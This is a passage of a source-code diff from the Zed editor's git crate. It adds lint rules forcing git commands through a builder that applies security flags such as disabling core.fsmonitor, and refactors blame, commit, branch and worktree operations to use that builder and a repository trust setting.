+ { path = "std::process::Command::stdin", reason = "`smol::process::Command::from()` does not preserve stdio configuration", replacement = "smol::process::Command::stdin" }, + { path = "std::process::Command::stdout", reason = "`smol::process::Command::from()` does not preserve stdio configuration", replacement = "smol::process::Command::stdout" }, + { path = "std::process::Command::stderr", reason = "`smol::process::Command::from()` does not preserve stdio configuration", replacement = "smol::process::Command::stderr" }, + { path = "smol::Timer::after", reason = "smol::Timer introduces non-determinism in tests", replacement = "gpui::BackgroundExecutor::timer" }, + { path = "serde_json::from_reader", reason = "Parsing from a buffer is much slower than first reading the buffer into a Vec/String, see https://github.com/serde-rs/json/issues/160#issuecomment-253446892. 
Use `serde_json::from_slice` instead." }, + { path = "serde_json_lenient::from_reader", reason = "Parsing from a buffer is much slower than first reading the buffer into a Vec/String, see https://github.com/serde-rs/json/issues/160#issuecomment-253446892, Use `serde_json_lenient::from_slice` instead." }, + { path = "cocoa::foundation::NSString::alloc", reason = "NSString must be autoreleased to avoid memory leaks. Use `ns_string()` helper instead." }, + { path = "smol::process::Command::new", reason = "Git commands must go through `GitBinary::build_command` to ensure security flags like `-c core.fsmonitor=false` are always applied.", replacement = "GitBinary::build_command" }, + { path = "util::command::new_command", reason = "Git commands must go through `GitBinary::build_command` to ensure security flags like `-c core.fsmonitor=false` are always applied.", replacement = "GitBinary::build_command" }, + { path = "util::command::Command::new", reason = "Git commands must go through `GitBinary::build_command` to ensure security flags like `-c core.fsmonitor=false` are always applied.", replacement = "GitBinary::build_command" }, +] +disallowed-types = [ + # { path = "std::collections::HashMap", replacement = "collections::HashMap" }, + # { path = "std::collections::HashSet", replacement = "collections::HashSet" }, + # { path = "indexmap::IndexSet", replacement = "collections::IndexSet" }, + # { path = "indexmap::IndexMap", replacement = "collections::IndexMap" }, +] \ No newline at end of file diff --git a/crates/git/src/blame.rs b/crates/git/src/blame.rs index 9dc184bf2ac253c8bc24f6203f13d6654ac2b64b..76e622fd6d7ae490c2c869c5ed02f02a48b45cab 100644 --- a/crates/git/src/blame.rs +++ b/crates/git/src/blame.rs @@ -1,11 +1,11 @@ use crate::Oid; use crate::commit::get_messages; -use crate::repository::RepoPath; +use crate::repository::{GitBinary, RepoPath}; use anyhow::{Context as _, Result}; use collections::{HashMap, HashSet}; use futures::AsyncWriteExt; use 
serde::{Deserialize, Serialize}; -use std::{ops::Range, path::Path}; +use std::ops::Range; use text::{LineEnding, Rope}; use time::OffsetDateTime; use time::UtcOffset; @@ -21,15 +21,13 @@ pub struct Blame { } impl Blame { - pub async fn for_path( - git_binary: &Path, - working_directory: &Path, + pub(crate) async fn for_path( + git: &GitBinary, path: &RepoPath, content: &Rope, line_ending: LineEnding, ) -> Result { - let output = - run_git_blame(git_binary, working_directory, path, content, line_ending).await?; + let output = run_git_blame(git, path, content, line_ending).await?; let mut entries = parse_git_blame(&output)?; entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); @@ -40,7 +38,7 @@ impl Blame { } let shas = unique_shas.into_iter().collect::>(); - let messages = get_messages(working_directory, &shas) + let messages = get_messages(git, &shas) .await .context("failed to get commit messages")?; @@ -52,8 +50,7 @@ const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; async fn run_git_blame( - git_binary: &Path, - working_directory: &Path, + git: &GitBinary, path: &RepoPath, contents: &Rope, line_ending: LineEnding, @@ -61,12 +58,7 @@ async fn run_git_blame( let mut child = { let span = ztracing::debug_span!("spawning git-blame command", path = path.as_unix_str()); let _enter = span.enter(); - util::command::new_command(git_binary) - .current_dir(working_directory) - .arg("blame") - .arg("--incremental") - .arg("--contents") - .arg("-") + git.build_command(&["blame", "--incremental", "--contents", "-"]) .arg(path.as_unix_str()) .stdin(Stdio::piped()) .stdout(Stdio::piped()) diff --git a/crates/git/src/commit.rs b/crates/git/src/commit.rs index 3f3526afc4ba8fa146592684a6d3acfc44ce7e73..50b62fa506bc31c0f4e2b3bedefc46cef415143b 100644 --- a/crates/git/src/commit.rs +++ b/crates/git/src/commit.rs @@ -1,11 +1,11 @@ use crate::{ BuildCommitPermalinkParams, GitHostingProviderRegistry, 
GitRemote, Oid, parse_git_remote_url, - status::StatusCode, + repository::GitBinary, status::StatusCode, }; use anyhow::{Context as _, Result}; use collections::HashMap; use gpui::SharedString; -use std::{path::Path, sync::Arc}; +use std::sync::Arc; #[derive(Clone, Debug, Default)] pub struct ParsedCommitMessage { @@ -48,7 +48,7 @@ impl ParsedCommitMessage { } } -pub async fn get_messages(working_directory: &Path, shas: &[Oid]) -> Result> { +pub(crate) async fn get_messages(git: &GitBinary, shas: &[Oid]) -> Result> { if shas.is_empty() { return Ok(HashMap::default()); } @@ -63,12 +63,12 @@ pub async fn get_messages(working_directory: &Path, shas: &[Oid]) -> Result Result>()) } -async fn get_messages_impl(working_directory: &Path, shas: &[Oid]) -> Result> { +async fn get_messages_impl(git: &GitBinary, shas: &[Oid]) -> Result> { const MARKER: &str = ""; - let output = util::command::new_command("git") - .current_dir(working_directory) - .arg("show") + let output = git + .build_command(&["show"]) .arg("-s") .arg(format!("--format=%B{}", MARKER)) .args(shas.iter().map(ToString::to_string)) @@ -92,7 +91,7 @@ async fn get_messages_impl(working_directory: &Path, shas: &[Oid]) -> Result for Oid { + type Error = anyhow::Error; + + fn try_from(value: &str) -> std::prelude::v1::Result { + Oid::from_str(value) + } +} + impl FromStr for Oid { type Err = anyhow::Error; diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index 1c707e1183d501224b85d562d805e54e2a3286ae..504480cb25b1f3d69c8e482b069568d710f57c29 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -21,6 +21,7 @@ use text::LineEnding; use std::collections::HashSet; use std::ffi::{OsStr, OsString}; +use std::sync::atomic::AtomicBool; use std::process::ExitStatus; use std::str::FromStr; @@ -35,7 +36,7 @@ use thiserror::Error; use util::command::{Stdio, new_command}; use util::paths::PathStyle; use util::rel_path::RelPath; -use util::{ResultExt, normalize_path, paths}; +use 
util::{ResultExt, paths}; use uuid::Uuid; pub use askpass::{AskPassDelegate, AskPassResult, AskPassSession}; @@ -49,101 +50,53 @@ pub const REMOTE_CANCELLED_BY_USER: &str = "Operation cancelled by user"; /// %x00 - Null byte separator, used to split up commit data static GRAPH_COMMIT_FORMAT: &str = "--format=%H%x00%P%x00%D"; +/// Used to get commits that match with a search +/// %H - Full commit hash +static SEARCH_COMMIT_FORMAT: &str = "--format=%H"; + /// Number of commits to load per chunk for the git graph. pub const GRAPH_CHUNK_SIZE: usize = 1000; /// Default value for the `git.worktree_directory` setting. pub const DEFAULT_WORKTREE_DIRECTORY: &str = "../worktrees"; -/// Resolves the configured worktree directory to an absolute path. -/// -/// `worktree_directory_setting` is the raw string from the user setting -/// (e.g. `"../worktrees"`, `".git/zed-worktrees"`, `"my-worktrees/"`). -/// Trailing slashes are stripped. The path is resolved relative to -/// `working_directory` (the repository's working directory root). -/// -/// When the resolved directory falls outside the working directory -/// (e.g. `"../worktrees"`), the repository's directory name is -/// automatically appended so that sibling repos don't collide. -/// For example, with working directory `~/code/zed` and setting -/// `"../worktrees"`, this returns `~/code/worktrees/zed`. +/// Determine the original (main) repository's working directory. /// -/// When the resolved directory is inside the working directory -/// (e.g. `".git/zed-worktrees"`), no extra component is added -/// because the path is already project-scoped. -pub fn resolve_worktree_directory( - working_directory: &Path, - worktree_directory_setting: &str, +/// For linked worktrees, `common_dir` differs from `repository_dir` and +/// points to the main repo's `.git` directory, so we can derive the main +/// repo's working directory from it. 
For normal repos and submodules, +/// `common_dir` equals `repository_dir`, and the original repo is simply +/// `work_directory` itself. +pub fn original_repo_path( + work_directory: &Path, + common_dir: &Path, + repository_dir: &Path, ) -> PathBuf { - let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']); - let joined = working_directory.join(trimmed); - let resolved = normalize_path(&joined); - - if resolved.starts_with(working_directory) { - resolved - } else if let Some(repo_dir_name) = working_directory.file_name() { - resolved.join(repo_dir_name) + if common_dir != repository_dir { + original_repo_path_from_common_dir(common_dir) } else { - resolved + work_directory.to_path_buf() } } -/// Validates that the resolved worktree directory is acceptable: -/// - The setting must not be an absolute path. -/// - The resolved path must be either a subdirectory of the working -/// directory or a subdirectory of its parent (i.e., a sibling). +/// Given the git common directory (from `commondir()`), derive the original +/// repository's working directory. /// -/// Returns `Ok(resolved_path)` or an error with a user-facing message. -pub fn validate_worktree_directory( - working_directory: &Path, - worktree_directory_setting: &str, -) -> Result { - // Check the original setting before trimming, since a path like "///" - // is absolute but becomes "" after stripping trailing separators. - // Also check for leading `/` or `\` explicitly, because on Windows - // `Path::is_absolute()` requires a drive letter — so `/tmp/worktrees` - // would slip through even though it's clearly not a relative path. 
- if Path::new(worktree_directory_setting).is_absolute() - || worktree_directory_setting.starts_with('/') - || worktree_directory_setting.starts_with('\\') - { - anyhow::bail!( - "git.worktree_directory must be a relative path, got: {worktree_directory_setting:?}" - ); - } - - if worktree_directory_setting.is_empty() { - anyhow::bail!("git.worktree_directory must not be empty"); - } - - let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']); - if trimmed == ".." { - anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)"); - } - - let resolved = resolve_worktree_directory(working_directory, worktree_directory_setting); - - let parent = working_directory.parent().unwrap_or(working_directory); - - if !resolved.starts_with(parent) { - anyhow::bail!( - "git.worktree_directory resolved to {resolved:?}, which is outside \ - the project root and its parent directory. It must resolve to a \ - subdirectory of {working_directory:?} or a sibling of it." - ); +/// For a standard checkout, `common_dir` is `/.git`, so the parent +/// is the working directory. For a git worktree, `common_dir` is the **main** +/// repo's `.git` directory, so the parent is the original repo's working directory. +/// +/// Falls back to returning `common_dir` itself if it doesn't end with `.git` +/// (e.g. bare repos or unusual layouts). +pub fn original_repo_path_from_common_dir(common_dir: &Path) -> PathBuf { + if common_dir.file_name() == Some(OsStr::new(".git")) { + common_dir + .parent() + .map(|p| p.to_path_buf()) + .unwrap_or_else(|| common_dir.to_path_buf()) + } else { + common_dir.to_path_buf() } - - Ok(resolved) -} - -/// Returns the full absolute path for a specific branch's worktree -/// given the resolved worktree directory. 
-pub fn worktree_path_for_branch( - working_directory: &Path, - worktree_directory_setting: &str, - branch: &str, -) -> PathBuf { - resolve_worktree_directory(working_directory, worktree_directory_setting).join(branch) } /// Commit data needed for the git graph visualization. @@ -282,22 +235,32 @@ impl Branch { #[derive(Clone, Debug, Hash, PartialEq, Eq)] pub struct Worktree { pub path: PathBuf, - pub ref_name: SharedString, + pub ref_name: Option, + // todo(git_worktree) This type should be a Oid pub sha: SharedString, + pub is_main: bool, } impl Worktree { - pub fn branch(&self) -> &str { - self.ref_name - .as_ref() - .strip_prefix("refs/heads/") - .or_else(|| self.ref_name.as_ref().strip_prefix("refs/remotes/")) - .unwrap_or(self.ref_name.as_ref()) + /// Returns a display name for the worktree, suitable for use in the UI. + /// + /// If the worktree is attached to a branch, returns the branch name. + /// Otherwise, returns the short SHA of the worktree's HEAD commit. + pub fn display_name(&self) -> &str { + match self.ref_name { + Some(ref ref_name) => ref_name + .strip_prefix("refs/heads/") + .or_else(|| ref_name.strip_prefix("refs/remotes/")) + .unwrap_or(ref_name), + // Detached HEAD — show the short SHA as a fallback. 
+ None => &self.sha[..self.sha.len().min(SHORT_SHA_LENGTH)], + } } } pub fn parse_worktrees_from_str>(raw_worktrees: T) -> Vec { let mut worktrees = Vec::new(); + let mut is_first = true; let normalized = raw_worktrees.as_ref().replace("\r\n", "\n"); let entries = normalized.split("\n\n"); for entry in entries { @@ -320,12 +283,14 @@ pub fn parse_worktrees_from_str>(raw_worktrees: T) -> Vec BoxFuture<'_, Result<()>>; fn rename_branch(&self, branch: String, new_name: String) -> BoxFuture<'_, Result<()>>; - fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>>; + fn delete_branch(&self, is_remote: bool, name: String) -> BoxFuture<'_, Result<()>>; fn worktrees(&self) -> BoxFuture<'_, Result>>; fn create_worktree( &self, - name: String, - directory: PathBuf, + branch_name: Option, + path: PathBuf, from_commit: Option, ) -> BoxFuture<'_, Result<()>>; @@ -903,8 +874,8 @@ pub trait GitRepository: Send + Sync { fn diff_stat( &self, - diff: DiffType, - ) -> BoxFuture<'_, Result>>; + path_prefixes: &[RepoPath], + ) -> BoxFuture<'_, Result>; /// Creates a checkpoint for the repository. 
fn checkpoint(&self) -> BoxFuture<'static, Result>; @@ -940,7 +911,23 @@ pub trait GitRepository: Send + Sync { request_tx: Sender>>, ) -> BoxFuture<'_, Result<()>>; + fn search_commits( + &self, + log_source: LogSource, + search_args: SearchCommitArgs, + request_tx: Sender, + ) -> BoxFuture<'_, Result<()>>; + fn commit_data_reader(&self) -> Result; + + fn update_ref(&self, ref_name: String, commit: String) -> BoxFuture<'_, Result<()>>; + + fn delete_ref(&self, ref_name: String) -> BoxFuture<'_, Result<()>>; + + fn repair_worktrees(&self) -> BoxFuture<'_, Result<()>>; + + fn set_trusted(&self, trusted: bool); + fn is_trusted(&self) -> bool; } pub enum DiffType { @@ -967,6 +954,7 @@ pub struct RealGitRepository { pub any_git_binary_path: PathBuf, any_git_binary_help_output: Arc>>, executor: BackgroundExecutor, + is_trusted: Arc, } impl RealGitRepository { @@ -975,16 +963,24 @@ impl RealGitRepository { bundled_git_binary_path: Option, system_git_binary_path: Option, executor: BackgroundExecutor, - ) -> Option { - let any_git_binary_path = system_git_binary_path.clone().or(bundled_git_binary_path)?; - let workdir_root = dotgit_path.parent()?; - let repository = git2::Repository::open(workdir_root).log_err()?; - Some(Self { + ) -> Result { + let any_git_binary_path = system_git_binary_path + .clone() + .or(bundled_git_binary_path) + .context("no git binary available")?; + log::info!( + "opening git repository at {dotgit_path:?} using git binary {any_git_binary_path:?}" + ); + let workdir_root = dotgit_path.parent().context(".git has no parent")?; + let repository = + git2::Repository::open(workdir_root).context("creating libgit2 repository")?; + Ok(Self { repository: Arc::new(Mutex::new(repository)), system_git_binary_path, any_git_binary_path, executor, any_git_binary_help_output: Arc::new(Mutex::new(None)), + is_trusted: Arc::new(AtomicBool::new(false)), }) } @@ -996,20 +992,25 @@ impl RealGitRepository { .map(Path::to_path_buf) } + fn git_binary(&self) -> Result { + 
Ok(GitBinary::new( + self.any_git_binary_path.clone(), + self.working_directory() + .with_context(|| "Can't run git commands without a working directory")?, + self.path(), + self.executor.clone(), + self.is_trusted(), + )) + } + async fn any_git_binary_help_output(&self) -> SharedString { if let Some(output) = self.any_git_binary_help_output.lock().clone() { return output; } - let git_binary_path = self.any_git_binary_path.clone(); - let executor = self.executor.clone(); - let working_directory = self.working_directory(); + let git_binary = self.git_binary(); let output: SharedString = self .executor - .spawn(async move { - GitBinary::new(git_binary_path, working_directory?, executor) - .run(["help", "-a"]) - .await - }) + .spawn(async move { git_binary?.run(&["help", "-a"]).await }) .await .unwrap_or_default() .into(); @@ -1051,13 +1052,18 @@ pub async fn get_git_committer(cx: &AsyncApp) -> GitCommitter { let git = GitBinary::new( git_binary_path.unwrap_or(PathBuf::from("git")), paths::home_dir().clone(), + paths::home_dir().join(".git"), cx.background_executor().clone(), + true, ); cx.background_spawn(async move { - let name = git.run(["config", "--global", "user.name"]).await.log_err(); + let name = git + .run(&["config", "--global", "user.name"]) + .await + .log_err(); let email = git - .run(["config", "--global", "user.email"]) + .run(&["config", "--global", "user.email"]) .await .log_err(); GitCommitter { name, email } @@ -1083,15 +1089,12 @@ impl GitRepository for RealGitRepository { } fn show(&self, commit: String) -> BoxFuture<'_, Result> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let output = new_command(git_binary_path) - .current_dir(&working_directory) - .args([ - "--no-optional-locks", + let git = git_binary?; + let output = git + .build_command(&[ "show", 
"--no-patch", "--format=%H%x00%B%x00%at%x00%ae%x00%an%x00", @@ -1121,16 +1124,14 @@ impl GitRepository for RealGitRepository { } fn load_commit(&self, commit: String, cx: AsyncApp) -> BoxFuture<'_, Result> { - let Some(working_directory) = self.repository.lock().workdir().map(ToOwned::to_owned) - else { + if self.repository.lock().workdir().is_none() { return future::ready(Err(anyhow!("no working directory"))).boxed(); - }; - let git_binary_path = self.any_git_binary_path.clone(); + } + let git_binary = self.git_binary(); cx.background_spawn(async move { - let show_output = util::command::new_command(&git_binary_path) - .current_dir(&working_directory) - .args([ - "--no-optional-locks", + let git = git_binary?; + let show_output = git + .build_command(&[ "show", "--format=", "-z", @@ -1150,9 +1151,8 @@ impl GitRepository for RealGitRepository { let changes = parse_git_diff_name_status(&show_stdout); let parent_sha = format!("{}^", commit); - let mut cat_file_process = util::command::new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["--no-optional-locks", "cat-file", "--batch=%(objectsize)"]) + let mut cat_file_process = git + .build_command(&["cat-file", "--batch=%(objectsize)"]) .stdin(Stdio::piped()) .stdout(Stdio::piped()) .stderr(Stdio::piped()) @@ -1259,18 +1259,17 @@ impl GitRepository for RealGitRepository { mode: ResetMode, env: Arc>, ) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); async move { - let working_directory = self.working_directory(); - let mode_flag = match mode { ResetMode::Mixed => "--mixed", ResetMode::Soft => "--soft", }; - let output = new_command(&self.any_git_binary_path) + let git = git_binary?; + let output = git + .build_command(&["reset", mode_flag, &commit]) .envs(env.iter()) - .current_dir(&working_directory?) 
- .args(["reset", mode_flag, &commit]) .output() .await?; anyhow::ensure!( @@ -1289,17 +1288,16 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); async move { if paths.is_empty() { return Ok(()); } - let output = new_command(&git_binary_path) - .current_dir(&working_directory?) + let git = git_binary?; + let output = git + .build_command(&["checkout", &commit, "--"]) .envs(env.iter()) - .args(["checkout", &commit, "--"]) .args(paths.iter().map(|path| path.as_unix_str())) .output() .await?; @@ -1321,33 +1319,29 @@ impl GitRepository for RealGitRepository { self.executor .spawn(async move { fn logic(repo: &git2::Repository, path: &RepoPath) -> Result> { - // This check is required because index.get_path() unwraps internally :( let mut index = repo.index()?; index.read(false)?; const STAGE_NORMAL: i32 = 0; - let path = path.as_std_path(); - // `RepoPath` contains a `RelPath` which normalizes `.` into an empty path - // `get_path` unwraps on empty paths though, so undo that normalization here - let path = if path.components().next().is_none() { - ".".as_ref() - } else { - path - }; - let oid = match index.get_path(path, STAGE_NORMAL) { - Some(entry) if entry.mode != GIT_MODE_SYMLINK => entry.id, - _ => return Ok(None), + // git2 unwraps internally on empty paths or `.` + if path.is_empty() { + bail!("empty path has no index text"); + } + let Some(entry) = index.get_path(path.as_std_path(), STAGE_NORMAL) else { + return Ok(None); }; + if entry.mode == GIT_MODE_SYMLINK { + return Ok(None); + } - let content = repo.find_blob(oid)?.content().to_owned(); + let content = repo.find_blob(entry.id)?.content().to_owned(); Ok(String::from_utf8(content).ok()) } - match logic(&repo.lock(), &path) { - Ok(value) => return value, - Err(err) => log::error!("Error loading index text: {:?}", 
err), - } - None + logic(&repo.lock(), &path) + .context("loading index text") + .log_err() + .flatten() }) .boxed() } @@ -1356,14 +1350,26 @@ impl GitRepository for RealGitRepository { let repo = self.repository.clone(); self.executor .spawn(async move { - let repo = repo.lock(); - let head = repo.head().ok()?.peel_to_tree().log_err()?; - let entry = head.get_path(path.as_std_path()).ok()?; - if entry.filemode() == i32::from(git2::FileMode::Link) { - return None; + fn logic(repo: &git2::Repository, path: &RepoPath) -> Result> { + let head = repo.head()?.peel_to_tree()?; + // git2 unwraps internally on empty paths or `.` + if path.is_empty() { + return Err(anyhow!("empty path has no committed text")); + } + let Some(entry) = head.get_path(path.as_std_path()).ok() else { + return Ok(None); + }; + if entry.filemode() == i32::from(git2::FileMode::Link) { + return Ok(None); + } + let content = repo.find_blob(entry.id())?.content().to_owned(); + Ok(String::from_utf8(content).ok()) } - let content = repo.find_blob(entry.id()).log_err()?.content().to_owned(); - String::from_utf8(content).ok() + + logic(&repo.lock(), &path) + .context("loading committed text") + .log_err() + .flatten() }) .boxed() } @@ -1386,18 +1392,16 @@ impl GitRepository for RealGitRepository { env: Arc>, is_executable: bool, ) -> BoxFuture<'_, anyhow::Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; + let git = git_binary?; let mode = if is_executable { "100755" } else { "100644" }; if let Some(content) = content { - let mut child = new_command(&git_binary_path) - .current_dir(&working_directory) + let mut child = git + .build_command(&["hash-object", "-w", "--stdin"]) .envs(env.iter()) - .args(["hash-object", "-w", "--stdin"]) .stdin(Stdio::piped()) .stdout(Stdio::piped()) .spawn()?; @@ -1410,10 +1414,9 @@ impl 
GitRepository for RealGitRepository { log::debug!("indexing SHA: {sha}, path {path:?}"); - let output = new_command(&git_binary_path) - .current_dir(&working_directory) + let output = git + .build_command(&["update-index", "--add", "--cacheinfo", mode, sha]) .envs(env.iter()) - .args(["update-index", "--add", "--cacheinfo", mode, sha]) .arg(path.as_unix_str()) .output() .await?; @@ -1425,10 +1428,9 @@ impl GitRepository for RealGitRepository { ); } else { log::debug!("removing path {path:?} from the index"); - let output = new_command(&git_binary_path) - .current_dir(&working_directory) + let output = git + .build_command(&["update-index", "--force-remove"]) .envs(env.iter()) - .args(["update-index", "--force-remove"]) .arg(path.as_unix_str()) .output() .await?; @@ -1457,18 +1459,12 @@ impl GitRepository for RealGitRepository { } fn revparse_batch(&self, revs: Vec) -> BoxFuture<'_, Result>>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let mut process = new_command(&git_binary_path) - .current_dir(&working_directory) - .args([ - "--no-optional-locks", - "cat-file", - "--batch-check=%(objectname)", - ]) + let git = git_binary?; + let mut process = git + .build_command(&["cat-file", "--batch-check=%(objectname)"]) .stdin(Stdio::piped()) .stdout(Stdio::piped()) .stderr(Stdio::piped()) @@ -1517,19 +1513,14 @@ impl GitRepository for RealGitRepository { } fn status(&self, path_prefixes: &[RepoPath]) -> Task> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = match self.working_directory() { - Ok(working_directory) => working_directory, + let git = match self.git_binary() { + Ok(git) => git, Err(e) => return Task::ready(Err(e)), }; let args = git_status_args(path_prefixes); log::debug!("Checking for git status in {path_prefixes:?}"); 
self.executor.spawn(async move { - let output = new_command(&git_binary_path) - .current_dir(working_directory) - .args(args) - .output() - .await?; + let output = git.build_command(&args).output().await?; if output.status.success() { let stdout = String::from_utf8_lossy(&output.stdout); stdout.parse() @@ -1541,14 +1532,12 @@ impl GitRepository for RealGitRepository { } fn diff_tree(&self, request: DiffTreeType) -> BoxFuture<'_, Result> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = match self.working_directory() { - Ok(working_directory) => working_directory, + let git = match self.git_binary() { + Ok(git) => git, Err(e) => return Task::ready(Err(e)).boxed(), }; let mut args = vec![ - OsString::from("--no-optional-locks"), OsString::from("diff-tree"), OsString::from("-r"), OsString::from("-z"), @@ -1568,11 +1557,7 @@ impl GitRepository for RealGitRepository { self.executor .spawn(async move { - let output = new_command(&git_binary_path) - .current_dir(working_directory) - .args(args) - .output() - .await?; + let output = git.build_command(&args).output().await?; if output.status.success() { let stdout = String::from_utf8_lossy(&output.stdout); stdout.parse() @@ -1585,13 +1570,12 @@ impl GitRepository for RealGitRepository { } fn stash_entries(&self) -> BoxFuture<'_, Result> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let output = new_command(&git_binary_path) - .current_dir(working_directory?) 
- .args(&["stash", "list", "--pretty=format:%gd%x00%H%x00%ct%x00%s"]) + let git = git_binary?; + let output = git + .build_command(&["stash", "list", "--pretty=format:%gd%x00%H%x00%ct%x00%s"]) .output() .await?; if output.status.success() { @@ -1606,8 +1590,7 @@ impl GitRepository for RealGitRepository { } fn branches(&self) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { let fields = [ @@ -1629,12 +1612,8 @@ impl GitRepository for RealGitRepository { "--format", &fields, ]; - let working_directory = working_directory?; - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(args) - .output() - .await?; + let git = git_binary?; + let output = git.build_command(&args).output().await?; anyhow::ensure!( output.status.success(), @@ -1648,11 +1627,7 @@ impl GitRepository for RealGitRepository { if branches.is_empty() { let args = vec!["symbolic-ref", "--quiet", "HEAD"]; - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(args) - .output() - .await?; + let output = git.build_command(&args).output().await?; // git symbolic-ref returns a non-0 exit code if HEAD points // to something other than a branch @@ -1674,13 +1649,12 @@ impl GitRepository for RealGitRepository { } fn worktrees(&self) -> BoxFuture<'_, Result>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let output = new_command(&git_binary_path) - .current_dir(working_directory?) 
- .args(&["--no-optional-locks", "worktree", "list", "--porcelain"]) + let git = git_binary?; + let output = git + .build_command(&["worktree", "list", "--porcelain"]) .output() .await?; if output.status.success() { @@ -1696,22 +1670,20 @@ impl GitRepository for RealGitRepository { fn create_worktree( &self, - name: String, - directory: PathBuf, + branch_name: Option, + path: PathBuf, from_commit: Option, ) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let final_path = directory.join(&name); - let mut args = vec![ - OsString::from("--no-optional-locks"), - OsString::from("worktree"), - OsString::from("add"), - OsString::from("-b"), - OsString::from(name.as_str()), - OsString::from("--"), - OsString::from(final_path.as_os_str()), - ]; + let git_binary = self.git_binary(); + let mut args = vec![OsString::from("worktree"), OsString::from("add")]; + if let Some(branch_name) = &branch_name { + args.push(OsString::from("-b")); + args.push(OsString::from(branch_name.as_str())); + } else { + args.push(OsString::from("--detach")); + } + args.push(OsString::from("--")); + args.push(OsString::from(path.as_os_str())); if let Some(from_commit) = from_commit { args.push(OsString::from(from_commit)); } else { @@ -1720,12 +1692,9 @@ impl GitRepository for RealGitRepository { self.executor .spawn(async move { - std::fs::create_dir_all(final_path.parent().unwrap_or(&final_path))?; - let output = new_command(&git_binary_path) - .current_dir(working_directory?) 
- .args(args) - .output() - .await?; + std::fs::create_dir_all(path.parent().unwrap_or(&path))?; + let git = git_binary?; + let output = git.build_command(&args).output().await?; if output.status.success() { Ok(()) } else { @@ -1737,48 +1706,35 @@ impl GitRepository for RealGitRepository { } fn remove_worktree(&self, path: PathBuf, force: bool) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let mut args: Vec = vec![ - "--no-optional-locks".into(), - "worktree".into(), - "remove".into(), - ]; + let mut args: Vec = vec!["worktree".into(), "remove".into()]; if force { args.push("--force".into()); } args.push("--".into()); args.push(path.as_os_str().into()); - GitBinary::new(git_binary_path, working_directory?, executor) - .run(args) - .await?; + git_binary?.run(&args).await?; anyhow::Ok(()) }) .boxed() } fn rename_worktree(&self, old_path: PathBuf, new_path: PathBuf) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { let args: Vec = vec![ - "--no-optional-locks".into(), "worktree".into(), "move".into(), "--".into(), old_path.as_os_str().into(), new_path.as_os_str().into(), ]; - GitBinary::new(git_binary_path, working_directory?, executor) - .run(args) - .await?; + git_binary?.run(&args).await?; anyhow::Ok(()) }) .boxed() @@ -1786,9 +1742,7 @@ impl GitRepository for RealGitRepository { fn change_branch(&self, name: String) -> BoxFuture<'_, Result<()>> { let repo = self.repository.clone(); - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - let executor = self.executor.clone(); + let git_binary = 
self.git_binary(); let branch = self.executor.spawn(async move { let repo = repo.lock(); let branch = if let Ok(branch) = repo.find_branch(&name, BranchType::Local) { @@ -1823,9 +1777,7 @@ impl GitRepository for RealGitRepository { self.executor .spawn(async move { let branch = branch.await?; - GitBinary::new(git_binary_path, working_directory?, executor) - .run(&["checkout", &branch]) - .await?; + git_binary?.run(&["checkout", &branch]).await?; anyhow::Ok(()) }) .boxed() @@ -1836,9 +1788,7 @@ impl GitRepository for RealGitRepository { name: String, base_branch: Option, ) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { @@ -1849,22 +1799,18 @@ impl GitRepository for RealGitRepository { args.push(&base_branch_str); } - GitBinary::new(git_binary_path, working_directory?, executor) - .run(&args) - .await?; + git_binary?.run(&args).await?; anyhow::Ok(()) }) .boxed() } fn rename_branch(&self, branch: String, new_name: String) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - GitBinary::new(git_binary_path, working_directory?, executor) + git_binary? 
